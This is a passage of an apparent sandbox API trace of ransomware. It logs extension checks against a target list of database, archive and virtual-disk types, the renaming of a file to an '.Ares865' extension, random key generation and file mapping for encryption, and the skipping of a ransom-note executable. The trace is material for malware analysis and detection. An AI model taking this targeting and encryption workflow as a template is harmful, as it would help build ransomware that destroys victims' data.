(lpString1="ico", lpString2="ba_") returned 1 [0089.182] lstrlenW (lpString="dbb") returned 3 [0089.182] lstrcmpiW (lpString1="ico", lpString2="dbb") returned 1 [0089.182] lstrlenW (lpString="vmdk") returned 4 [0089.182] lstrcmpiW (lpString1=".ico", lpString2="vmdk") returned -1 [0089.182] lstrlenW (lpString="rar") returned 3 [0089.182] lstrcmpiW (lpString1="ico", lpString2="rar") returned -1 [0089.182] lstrlenW (lpString="zip") returned 3 [0089.182] lstrcmpiW (lpString1="ico", lpString2="zip") returned -1 [0089.182] lstrlenW (lpString="tgz") returned 3 [0089.182] lstrcmpiW (lpString1="ico", lpString2="tgz") returned -1 [0089.182] lstrlenW (lpString="vbox") returned 4 [0089.182] lstrcmpiW (lpString1=".ico", lpString2="vbox") returned -1 [0089.182] lstrlenW (lpString="vdi") returned 3 [0089.182] lstrcmpiW (lpString1="ico", lpString2="vdi") returned -1 [0089.182] lstrlenW (lpString="vhd") returned 3 [0089.182] lstrcmpiW (lpString1="ico", lpString2="vhd") returned -1 [0089.182] lstrlenW (lpString="vhdx") returned 4 [0089.182] lstrcmpiW (lpString1=".ico", lpString2="vhdx") returned -1 [0089.182] lstrlenW (lpString="avhd") returned 4 [0089.182] lstrcmpiW (lpString1=".ico", lpString2="avhd") returned -1 [0089.182] lstrlenW (lpString="db") returned 2 [0089.183] lstrcmpiW (lpString1="co", lpString2="db") returned -1 [0089.183] lstrlenW (lpString="db2") returned 3 [0089.183] lstrcmpiW (lpString1="ico", lpString2="db2") returned 1 [0089.183] lstrlenW (lpString="db3") returned 3 [0089.183] lstrcmpiW (lpString1="ico", lpString2="db3") returned 1 [0089.183] lstrlenW (lpString="dbf") returned 3 [0089.183] lstrcmpiW (lpString1="ico", lpString2="dbf") returned 1 [0089.183] lstrlenW (lpString="mdf") returned 3 [0089.183] lstrcmpiW (lpString1="ico", lpString2="mdf") returned -1 [0089.183] lstrlenW (lpString="mdb") returned 3 [0089.183] lstrcmpiW (lpString1="ico", lpString2="mdb") returned -1 [0089.183] lstrlenW (lpString="sql") returned 3 [0089.183] lstrcmpiW (lpString1="ico", lpString2="sql") returned -1 [0089.183] lstrlenW (lpString="sqlite") returned 6 [0089.183] lstrcmpiW (lpString1="er.ico", lpString2="sqlite") returned -1 [0089.183] lstrlenW (lpString="sqlite3") returned 7 [0089.183] lstrcmpiW (lpString1="der.ico", lpString2="sqlite3") returned -1 [0089.183] lstrlenW (lpString="sqlitedb") returned 8 [0089.183] lstrcmpiW (lpString1="lder.ico", lpString2="sqlitedb") returned -1 [0089.183] lstrlenW (lpString="xml") returned 3 [0089.183] lstrcmpiW (lpString1="ico", lpString2="xml") returned -1 [0089.183] lstrlenW (lpString="$er") returned 3 [0089.183] lstrcmpiW (lpString1="ico", lpString2="$er") returned 1 [0089.183] lstrlenW (lpString="4dd") returned 3 [0089.183] lstrcmpiW (lpString1="ico", lpString2="4dd") returned 1 [0089.183] lstrlenW (lpString="4dl") returned 3 [0089.183] lstrcmpiW (lpString1="ico", lpString2="4dl") returned 1 [0089.183] lstrlenW (lpString="^^^") returned 3 [0089.183] lstrcmpiW (lpString1="ico", lpString2="^^^") returned 1 [0089.183] lstrlenW (lpString="abs") returned 3 [0089.183] lstrcmpiW (lpString1="ico", lpString2="abs") returned 1 [0089.183] lstrlenW (lpString="abx") returned 3 [0089.183] lstrcmpiW (lpString1="ico", lpString2="abx") returned 1 [0089.183] lstrlenW (lpString="accdb") returned 5 [0089.183] lstrcmpiW (lpString1="r.ico", lpString2="accdb") returned 1 [0089.183] lstrlenW (lpString="accdc") returned 5 [0089.183] lstrcmpiW (lpString1="r.ico", lpString2="accdc") returned 1 [0089.183] lstrlenW (lpString="accde") returned 5 [0089.183] lstrcmpiW (lpString1="r.ico", lpString2="accde") returned 1 [0089.183] lstrlenW (lpString="accdr") returned 5 [0089.184] lstrcmpiW (lpString1="r.ico", lpString2="accdr") returned 1 [0089.184] lstrlenW (lpString="accdt") returned 5 [0089.184] lstrcmpiW (lpString1="r.ico", lpString2="accdt") returned 1 [0089.184] lstrlenW (lpString="accdw") returned 5 [0089.184] lstrcmpiW (lpString1="r.ico", lpString2="accdw") returned 1 [0089.184] lstrlenW (lpString="accft") returned 5 [0089.184] lstrcmpiW (lpString1="r.ico", lpString2="accft") returned 1 [0089.184] lstrlenW (lpString="adb") returned 3 [0089.184] lstrcmpiW (lpString1="ico", lpString2="adb") returned 1 [0089.184] lstrlenW (lpString="adb") returned 3 [0089.184] lstrcmpiW (lpString1="ico", lpString2="adb") returned 1 [0089.184] lstrlenW (lpString="ade") returned 3 [0089.184] lstrcmpiW (lpString1="ico", lpString2="ade") returned 1 [0089.184] lstrlenW (lpString="adf") returned 3 [0089.184] lstrcmpiW (lpString1="ico", lpString2="adf") returned 1 [0089.184] lstrlenW (lpString="adn") returned 3 [0089.184] lstrcmpiW (lpString1="ico", lpString2="adn") returned 1 [0089.184] lstrlenW (lpString="adp") returned 3 [0089.184] lstrcmpiW (lpString1="ico", lpString2="adp") returned 1 [0089.184] lstrlenW (lpString="alf") returned 3 [0089.184] lstrcmpiW (lpString1="ico", lpString2="alf") returned 1 [0089.184] lstrlenW (lpString="ask") returned 3 [0089.184] lstrcmpiW (lpString1="ico", lpString2="ask") returned 1 [0089.184] lstrlenW (lpString="btr") returned 3 [0089.184] lstrcmpiW (lpString1="ico", lpString2="btr") returned 1 [0089.184] lstrlenW (lpString="cat") returned 3 [0089.184] lstrcmpiW (lpString1="ico", lpString2="cat") returned 1 [0089.184] lstrlenW (lpString="cdb") returned 3 [0089.184] lstrcmpiW (lpString1="ico", lpString2="cdb") returned 1 [0089.184] lstrlenW (lpString="ckp") returned 3 [0089.184] lstrcmpiW (lpString1="ico", lpString2="ckp") returned 1 [0089.184] lstrlenW (lpString="cma") returned 3 [0089.184] lstrcmpiW (lpString1="ico", lpString2="cma") returned 1 [0089.184] lstrlenW (lpString="cpd") returned 3 [0089.184] lstrcmpiW (lpString1="ico", lpString2="cpd") returned 1 [0089.184] lstrlenW (lpString="dacpac") returned 6 [0089.184] lstrcmpiW (lpString1="er.ico", lpString2="dacpac") returned 1 [0089.184] lstrlenW (lpString="dad") returned 3 [0089.184] lstrcmpiW (lpString1="ico", lpString2="dad") returned 1 [0089.185] lstrlenW (lpString="dadiagrams") returned 10 [0089.185] lstrlenW (lpString="daschema") returned 8 [0089.185] lstrcmpiW (lpString1="lder.ico", lpString2="daschema") returned 1 [0089.185] lstrlenW (lpString="db-journal") returned 10 [0089.185] lstrlenW (lpString="db-shm") returned 6 [0089.185] lstrcmpiW (lpString1="er.ico", lpString2="db-shm") returned 1 [0089.185] lstrlenW (lpString="db-wal") returned 6 [0089.185] lstrcmpiW (lpString1="er.ico", lpString2="db-wal") returned 1 [0089.185] lstrlenW (lpString="dbc") returned 3 [0089.185] lstrcmpiW (lpString1="ico", lpString2="dbc") returned 1 [0089.185] lstrlenW (lpString="dbs") returned 3 [0089.185] lstrcmpiW (lpString1="ico", lpString2="dbs") returned 1 [0089.185] lstrlenW (lpString="dbt") returned 3 [0089.185] lstrcmpiW (lpString1="ico", lpString2="dbt") returned 1 [0089.185] lstrlenW (lpString="dbv") returned 3 [0089.185] lstrcmpiW (lpString1="ico", lpString2="dbv") returned 1 [0089.185] lstrlenW (lpString="dbx") returned 3 [0089.185] lstrcmpiW (lpString1="ico", lpString2="dbx") returned 1 [0089.185] lstrlenW (lpString="dcb") returned 3 [0089.185] lstrcmpiW (lpString1="ico", lpString2="dcb") returned 1 [0089.185] lstrlenW (lpString="dct") returned 3 [0089.185] lstrcmpiW (lpString1="ico", lpString2="dct") returned 1 [0089.185] lstrlenW (lpString="dcx") returned 3 [0089.185] lstrcmpiW (lpString1="ico", lpString2="dcx") returned 1 [0089.185] lstrlenW (lpString="ddl") returned 3 [0089.185] lstrcmpiW (lpString1="ico", lpString2="ddl") returned 1 [0089.185] lstrlenW (lpString="dlis") returned 4 [0089.185] lstrcmpiW (lpString1=".ico", lpString2="dlis") returned -1 [0089.185] lstrlenW (lpString="dp1") returned 3 [0089.185] lstrcmpiW (lpString1="ico", lpString2="dp1") returned 1 [0089.185] lstrlenW (lpString="dqy") returned 3 [0089.185] lstrcmpiW (lpString1="ico", lpString2="dqy") returned 1 [0089.185] lstrlenW (lpString="dsk") returned 3 [0089.185] lstrcmpiW (lpString1="ico", lpString2="dsk") returned 1 [0089.185] lstrlenW (lpString="dsn") returned 3 [0089.185] lstrcmpiW (lpString1="ico", lpString2="dsn") returned 1 [0089.185] lstrlenW (lpString="dtsx") returned 4 [0089.185] lstrcmpiW (lpString1=".ico", lpString2="dtsx") returned -1 [0089.185] lstrlenW (lpString="dxl") returned 3 [0089.186] lstrcmpiW (lpString1="ico", lpString2="dxl") returned 1 [0089.186] lstrlenW (lpString="eco") returned 3 [0089.186] lstrcmpiW (lpString1="ico", lpString2="eco") returned 1 [0089.186] lstrlenW (lpString="ecx") returned 3 [0089.186] lstrcmpiW (lpString1="ico", lpString2="ecx") returned 1 [0089.186] lstrlenW (lpString="edb") returned 3 [0089.186] lstrcmpiW (lpString1="ico", lpString2="edb") returned 1 [0089.186] lstrlenW (lpString="epim") returned 4 [0089.186] lstrcmpiW (lpString1=".ico", lpString2="epim") returned -1 [0089.186] lstrlenW (lpString="fcd") returned 3 [0089.186] lstrcmpiW (lpString1="ico", lpString2="fcd") returned 1 [0089.186] lstrlenW (lpString="fdb") returned 3 [0089.186] lstrcmpiW (lpString1="ico", lpString2="fdb") returned 1 [0089.186] lstrlenW (lpString="fic") returned 3 [0089.186] lstrcmpiW (lpString1="ico", lpString2="fic") returned 1 [0089.186] lstrlenW (lpString="flexolibrary") returned 12 [0089.186] lstrlenW (lpString="fm5") returned 3 [0089.186] lstrcmpiW (lpString1="ico", lpString2="fm5") returned 1 [0089.186] lstrlenW (lpString="fmp") returned 3 [0089.186] lstrcmpiW (lpString1="ico", lpString2="fmp") returned 1 [0089.186] lstrlenW (lpString="fmp12") returned 5 [0089.186] lstrcmpiW (lpString1="r.ico", lpString2="fmp12") returned 1 [0089.186] lstrlenW (lpString="fmpsl") returned 5 [0089.186] lstrcmpiW (lpString1="r.ico", lpString2="fmpsl") returned 1 [0089.186] lstrlenW (lpString="fol") returned 3 [0089.186] lstrcmpiW (lpString1="ico", lpString2="fol") returned 1 [0089.186] lstrlenW (lpString="fp3") returned 3 [0089.186] lstrcmpiW (lpString1="ico", lpString2="fp3") returned 1 [0089.186] lstrlenW (lpString="fp4") returned 3 [0089.186] lstrcmpiW (lpString1="ico", lpString2="fp4") returned 1 [0089.186] lstrlenW (lpString="fp5") returned 3 [0089.186] lstrcmpiW (lpString1="ico", lpString2="fp5") returned 1 [0089.186] lstrlenW (lpString="fp7") returned 3 [0089.186] lstrcmpiW (lpString1="ico", lpString2="fp7") returned 1 [0089.186] lstrlenW (lpString="fpt") returned 3 [0089.186] lstrcmpiW (lpString1="ico", lpString2="fpt") returned 1 [0089.186] lstrlenW (lpString="frm") returned 3 [0089.186] lstrcmpiW (lpString1="ico", lpString2="frm") returned 1 [0089.186] lstrlenW (lpString="gdb") returned 3 [0089.187] lstrcmpiW (lpString1="ico", lpString2="gdb") returned 1 [0089.187] lstrlenW (lpString="gdb") returned 3 [0089.187] lstrcmpiW (lpString1="ico", lpString2="gdb") returned 1 [0089.187] lstrlenW (lpString="grdb") returned 4 [0089.187] lstrcmpiW (lpString1=".ico", lpString2="grdb") returned -1 [0089.187] lstrlenW (lpString="gwi") returned 3 [0089.187] lstrcmpiW (lpString1="ico", lpString2="gwi") returned 1 [0089.187] lstrlenW (lpString="hdb") returned 3 [0089.187] lstrcmpiW (lpString1="ico", lpString2="hdb") returned 1 [0089.187] lstrlenW (lpString="his") returned 3 [0089.187] lstrcmpiW (lpString1="ico", lpString2="his") returned 1 [0089.187] lstrlenW (lpString="ib") returned 2 [0089.187] lstrcmpiW (lpString1="co", lpString2="ib") returned -1 [0089.187] lstrlenW (lpString="idb") returned 3 [0089.187] lstrcmpiW (lpString1="ico", lpString2="idb") returned -1 [0089.187] lstrlenW (lpString="ihx") returned 3 [0089.187] lstrcmpiW (lpString1="ico", lpString2="ihx") returned -1 [0089.187] lstrlenW (lpString="itdb") returned 4 [0089.187] lstrcmpiW (lpString1=".ico", lpString2="itdb") returned -1 [0089.187] lstrlenW (lpString="itw") returned 3 [0089.187] lstrcmpiW (lpString1="ico", lpString2="itw") returned -1 [0089.187] lstrlenW (lpString="jet") returned 3 [0089.187] lstrcmpiW (lpString1="ico", lpString2="jet") returned -1 [0089.187] lstrlenW (lpString="jtx") returned 3 [0089.187] lstrcmpiW (lpString1="ico", lpString2="jtx") returned -1 [0089.187] lstrlenW (lpString="kdb") returned 3 [0089.187] lstrcmpiW (lpString1="ico", lpString2="kdb") returned -1 [0089.187] lstrlenW (lpString="kexi") returned 4 [0089.187] lstrcmpiW (lpString1=".ico", lpString2="kexi") returned -1 [0089.187] lstrlenW (lpString="kexic") returned 5 [0089.187] lstrcmpiW (lpString1="r.ico", lpString2="kexic") returned 1 [0089.187] lstrlenW (lpString="kexis") returned 5 [0089.187] lstrcmpiW (lpString1="r.ico", lpString2="kexis") returned 1 [0089.187] lstrlenW (lpString="lgc") returned 3 [0089.187] lstrcmpiW (lpString1="ico", lpString2="lgc") returned -1 [0089.187] lstrlenW (lpString="lwx") returned 3 [0089.187] lstrcmpiW (lpString1="ico", lpString2="lwx") returned -1 [0089.187] lstrlenW (lpString="maf") returned 3 [0089.187] lstrcmpiW (lpString1="ico", lpString2="maf") returned -1 [0089.188] lstrlenW (lpString="maq") returned 3 [0089.188] lstrcmpiW (lpString1="ico", lpString2="maq") returned -1 [0089.188] lstrlenW (lpString="mar") returned 3 [0089.188] lstrcmpiW (lpString1="ico", lpString2="mar") returned -1 [0089.188] lstrlenW (lpString="marshal") returned 7 [0089.188] lstrcmpiW (lpString1="der.ico", lpString2="marshal") returned -1 [0089.188] lstrlenW (lpString="mas") returned 3 [0089.188] lstrcmpiW (lpString1="ico", lpString2="mas") returned -1 [0089.188] lstrlenW (lpString="mav") returned 3 [0089.188] lstrcmpiW (lpString1="ico", lpString2="mav") returned -1 [0089.188] lstrlenW (lpString="maw") returned 3 [0089.188] lstrcmpiW (lpString1="ico", lpString2="maw") returned -1 [0089.188] lstrlenW (lpString="mdbhtml") returned 7 [0089.188] lstrcmpiW (lpString1="der.ico", lpString2="mdbhtml") returned -1 [0089.188] lstrlenW (lpString="mdn") returned 3 [0089.188] lstrcmpiW (lpString1="ico", lpString2="mdn") returned -1 [0089.188] lstrlenW (lpString="mdt") returned 3 [0089.188] lstrcmpiW (lpString1="ico", lpString2="mdt") returned -1 [0089.188] lstrlenW (lpString="mfd") returned 3 [0089.188] lstrcmpiW (lpString1="ico", lpString2="mfd") returned -1 [0089.188] lstrlenW (lpString="mpd") returned 3 [0089.188] lstrcmpiW (lpString1="ico", lpString2="mpd") returned -1 [0089.188] lstrlenW (lpString="mrg") returned 3 [0089.188] lstrcmpiW (lpString1="ico", lpString2="mrg") returned -1 [0089.188] lstrlenW (lpString="mud") returned 3 [0089.188] lstrcmpiW (lpString1="ico", lpString2="mud") returned -1 [0089.188] lstrlenW (lpString="mwb") returned 3 [0089.188] lstrcmpiW (lpString1="ico", lpString2="mwb") returned -1 [0089.188] lstrlenW (lpString="myd") returned 3 [0089.188] lstrcmpiW (lpString1="ico", lpString2="myd") returned -1 [0089.188] lstrlenW (lpString="ndf") returned 3 [0089.188] lstrcmpiW (lpString1="ico", lpString2="ndf") returned -1 [0089.188] lstrlenW (lpString="nnt") returned 3 [0089.188] lstrcmpiW (lpString1="ico", lpString2="nnt") returned -1 [0089.188] lstrlenW (lpString="nrmlib") returned 6 [0089.188] lstrcmpiW (lpString1="er.ico", lpString2="nrmlib") returned -1 [0089.188] lstrlenW (lpString="ns2") returned 3 [0089.188] lstrcmpiW (lpString1="ico", lpString2="ns2") returned -1 [0089.188] lstrlenW (lpString="ns3") returned 3 [0089.189] lstrcmpiW (lpString1="ico", lpString2="ns3") returned -1 [0089.189] lstrlenW (lpString="ns4") returned 3 [0089.189] lstrcmpiW (lpString1="ico", lpString2="ns4") returned -1 [0089.189] lstrlenW (lpString="nsf") returned 3 [0089.189] lstrcmpiW (lpString1="ico", lpString2="nsf") returned -1 [0089.189] lstrlenW (lpString="nv") returned 2 [0089.189] lstrcmpiW (lpString1="co", lpString2="nv") returned -1 [0089.189] lstrlenW (lpString="nv2") returned 3 [0089.189] lstrcmpiW (lpString1="ico", lpString2="nv2") returned -1 [0089.189] lstrlenW (lpString="nwdb") returned 4 [0089.189] lstrcmpiW (lpString1=".ico", lpString2="nwdb") returned -1 [0089.189] lstrlenW (lpString="nyf") returned 3 [0089.189] lstrcmpiW (lpString1="ico", lpString2="nyf") returned -1 [0089.189] lstrlenW (lpString="odb") returned 3 [0089.189] lstrcmpiW (lpString1="ico", lpString2="odb") returned -1 [0089.189] lstrlenW (lpString="odb") returned 3 [0089.189] lstrcmpiW (lpString1="ico", lpString2="odb") returned -1 [0089.189] lstrlenW (lpString="oqy") returned 3 [0089.189] lstrcmpiW (lpString1="ico", lpString2="oqy") returned -1 [0089.189] lstrlenW (lpString="ora") returned 3 [0089.189] lstrcmpiW (lpString1="ico", lpString2="ora") returned -1 [0089.189] lstrlenW (lpString="orx") returned 3 [0089.189] lstrcmpiW (lpString1="ico", lpString2="orx") returned -1 [0089.189] lstrlenW (lpString="owc") returned 3 [0089.189] lstrcmpiW (lpString1="ico", lpString2="owc") returned -1 [0089.189] lstrlenW (lpString="p96") returned 3 [0089.189] lstrcmpiW (lpString1="ico", lpString2="p96") returned -1 [0089.189] lstrlenW (lpString="p97") returned 3 [0089.189] lstrcmpiW (lpString1="ico", lpString2="p97") returned -1 [0089.189] lstrlenW (lpString="pan") returned 3 [0089.189] lstrcmpiW (lpString1="ico", lpString2="pan") returned -1 [0089.189] lstrlenW (lpString="pdb") returned 3 [0089.189] lstrcmpiW (lpString1="ico", lpString2="pdb") returned -1 [0089.189] lstrlenW (lpString="pdm") returned 3 [0089.189] lstrcmpiW (lpString1="ico", lpString2="pdm") returned -1 [0089.189] lstrlenW (lpString="pnz") returned 3 [0089.189] lstrcmpiW (lpString1="ico", lpString2="pnz") returned -1 [0089.189] lstrlenW (lpString="qry") returned 3 [0089.189] lstrcmpiW (lpString1="ico", lpString2="qry") returned -1 [0089.190] lstrlenW (lpString="qvd") returned 3 [0089.190] lstrcmpiW (lpString1="ico", lpString2="qvd") returned -1 [0089.190] lstrlenW (lpString="rbf") returned 3 [0089.190] lstrcmpiW (lpString1="ico", lpString2="rbf") returned -1 [0089.190] lstrlenW (lpString="rctd") returned 4 [0089.190] lstrcmpiW (lpString1=".ico", lpString2="rctd") returned -1 [0089.190] lstrlenW (lpString="rod") returned 3 [0089.190] lstrcmpiW (lpString1="ico", lpString2="rod") returned -1 [0089.190] lstrlenW (lpString="rodx") returned 4 [0089.190] lstrcmpiW (lpString1=".ico", lpString2="rodx") returned -1 [0089.190] lstrlenW (lpString="rpd") returned 3 [0089.190] lstrcmpiW (lpString1="ico", lpString2="rpd") returned -1 [0089.190] lstrlenW (lpString="rsd") returned 3 [0089.190] lstrcmpiW (lpString1="ico", lpString2="rsd") returned -1 [0089.190] lstrlenW (lpString="sas7bdat") returned 8 [0089.190] lstrcmpiW (lpString1="lder.ico", lpString2="sas7bdat") returned -1 [0089.190] lstrlenW (lpString="sbf") returned 3 [0089.190] lstrcmpiW (lpString1="ico", lpString2="sbf") returned -1 [0089.190] lstrlenW (lpString="scx") returned 3 [0089.190] lstrcmpiW (lpString1="ico", lpString2="scx") returned -1 [0089.190] lstrlenW (lpString="sdb") returned 3 [0089.190] lstrcmpiW (lpString1="ico", lpString2="sdb") returned -1 [0089.190] lstrlenW (lpString="sdc") returned 3 [0089.190] lstrcmpiW (lpString1="ico", lpString2="sdc") returned -1 [0089.190] lstrlenW (lpString="sdf") returned 3 [0089.190] lstrcmpiW (lpString1="ico", lpString2="sdf") returned -1 [0089.190] lstrlenW (lpString="sis") returned 3 [0089.190] lstrcmpiW (lpString1="ico", lpString2="sis") returned -1 [0089.190] lstrlenW (lpString="spq") returned 3 [0089.190] lstrcmpiW (lpString1="ico", lpString2="spq") returned -1 [0089.190] lstrlenW (lpString="te") returned 2 [0089.190] lstrcmpiW (lpString1="co", lpString2="te") returned -1 [0089.190] lstrlenW (lpString="teacher") returned 7 [0089.190] lstrcmpiW (lpString1="der.ico", lpString2="teacher") returned -1 [0089.190] lstrlenW (lpString="tmd") returned 3 [0089.190] lstrcmpiW (lpString1="ico", lpString2="tmd") returned -1 [0089.190] lstrlenW (lpString="tps") returned 3 [0089.190] lstrcmpiW (lpString1="ico", lpString2="tps") returned -1 [0089.190] lstrlenW (lpString="trc") returned 3 [0089.191] lstrcmpiW (lpString1="ico", lpString2="trc") returned -1 [0089.191] lstrlenW (lpString="trc") returned 3 [0089.191] lstrcmpiW (lpString1="ico", lpString2="trc") returned -1 [0089.191] lstrlenW (lpString="trm") returned 3 [0089.191] lstrcmpiW (lpString1="ico", lpString2="trm") returned -1 [0089.191] lstrlenW (lpString="udb") returned 3 [0089.191] lstrcmpiW (lpString1="ico", lpString2="udb") returned -1 [0089.191] lstrlenW (lpString="udl") returned 3 [0089.191] lstrcmpiW (lpString1="ico", lpString2="udl") returned -1 [0089.191] lstrlenW (lpString="usr") returned 3 [0089.191] lstrcmpiW (lpString1="ico", lpString2="usr") returned -1 [0089.191] lstrlenW (lpString="v12") returned 3 [0089.191] lstrcmpiW (lpString1="ico", lpString2="v12") returned -1 [0089.191] lstrlenW (lpString="vis") returned 3 [0089.191] lstrcmpiW (lpString1="ico", lpString2="vis") returned -1 [0089.191] lstrlenW (lpString="vpd") returned 3 [0089.191] lstrcmpiW (lpString1="ico", lpString2="vpd") returned -1 [0089.191] lstrlenW (lpString="vvv") returned 3 [0089.191] lstrcmpiW (lpString1="ico", lpString2="vvv") returned -1 [0089.191] lstrlenW (lpString="wdb") returned 3 [0089.191] lstrcmpiW (lpString1="ico", lpString2="wdb") returned -1 [0089.191] lstrlenW (lpString="wmdb") returned 4 [0089.191] lstrcmpiW (lpString1=".ico", lpString2="wmdb") returned -1 [0089.191] lstrlenW (lpString="wrk") returned 3 [0089.191] lstrcmpiW (lpString1="ico", lpString2="wrk") returned -1 [0089.191] lstrlenW (lpString="xdb") returned 3 [0089.191] lstrcmpiW (lpString1="ico", lpString2="xdb") returned -1 [0089.191] lstrlenW (lpString="xld") returned 3 [0089.191] lstrcmpiW (lpString1="ico", lpString2="xld") returned -1 [0089.191] lstrlenW (lpString="xmlff") returned 5 [0089.191] lstrcmpiW (lpString1="r.ico", lpString2="xmlff") returned -1 [0089.191] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\folder.ico.Ares865") returned 104 [0089.191] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\folder.ico" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\folder.ico"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\folder.ico.Ares865" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\folder.ico.ares865"), dwFlags=0x1) returned 1 [0089.192] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\folder.ico.Ares865" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\folder.ico.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0089.192] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=53411) returned 1 [0089.193] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0089.193] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0089.193] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0089.193] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0089.194] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0089.194] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0089.194] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xd3b0, lpName=0x0) returned 0x15c [0089.195] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xd3b0) returned 0x190000 [0089.199] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0089.200] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0089.200] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0089.200] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0089.200] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0089.200] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x31afc8 [0089.200] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32afc8 [0089.200] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0089.200] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32b0e0 [0089.200] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0089.200] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32b0e0 | out: hHeap=0x2b0000) returned 1 [0089.200] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0089.200] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0089.200] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0089.201] CloseHandle (hObject=0x15c) returned 1 [0089.201] CloseHandle (hObject=0x118) returned 1 [0089.201] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0089.201] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0089.201] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0089.201] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4c766560, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4c766560, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0089.201] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0089.201] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f0eca86, ftCreationTime.dwHighDateTime=0x1ca040c, ftLastAccessTime.dwLowDateTime=0x5f0eca86, ftLastAccessTime.dwHighDateTime=0x1ca040c, ftLastWriteTime.dwLowDateTime=0xc78c9009, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0xe3c8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="print_pref.ico", cAlternateFileName="")) returned 1 [0089.201] lstrcmpiW (lpString1="print_pref.ico", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0089.201] lstrcmpiW (lpString1="print_pref.ico", lpString2="aoldtz.exe") returned 1 [0089.201] lstrcmpiW (lpString1="print_pref.ico", lpString2=".") returned 1 [0089.201] lstrcmpiW (lpString1="print_pref.ico", lpString2="..") returned 1 [0089.201] lstrcmpiW (lpString1="print_pref.ico", lpString2="windows") returned -1 [0089.202] lstrcmpiW (lpString1="print_pref.ico", lpString2="bootmgr") returned 1 